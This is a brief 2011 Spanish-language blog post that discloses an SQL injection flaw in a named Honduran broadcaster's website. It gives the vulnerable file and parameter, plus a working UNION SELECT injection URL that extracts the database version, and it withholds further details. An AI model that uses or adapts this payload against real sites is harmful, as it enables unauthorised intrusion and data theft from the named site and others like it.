martes, 9 de agosto de 2011

[hack] - iSQL sitio de Televicentro

 Vulnerabilidad de inyección de SQL

Archivo Vulnerable                   Campo vulnerable
tvconline_noticia-detalle.php        noticia_id

 
Detalles:  Con solo inyectar ' en la url mencionada y se obtiene el error.
 
Ejemplo: 
Version de Mysql:
http://televicentro.hn/new/tvconline_noticia-detalle.php?noticia_id=23814+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,version%28%29,20,21,22,23,24--


 Sin más detalles para evitar el abuso de Script kiddies.

0 comentarios :

Publicar un comentario

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host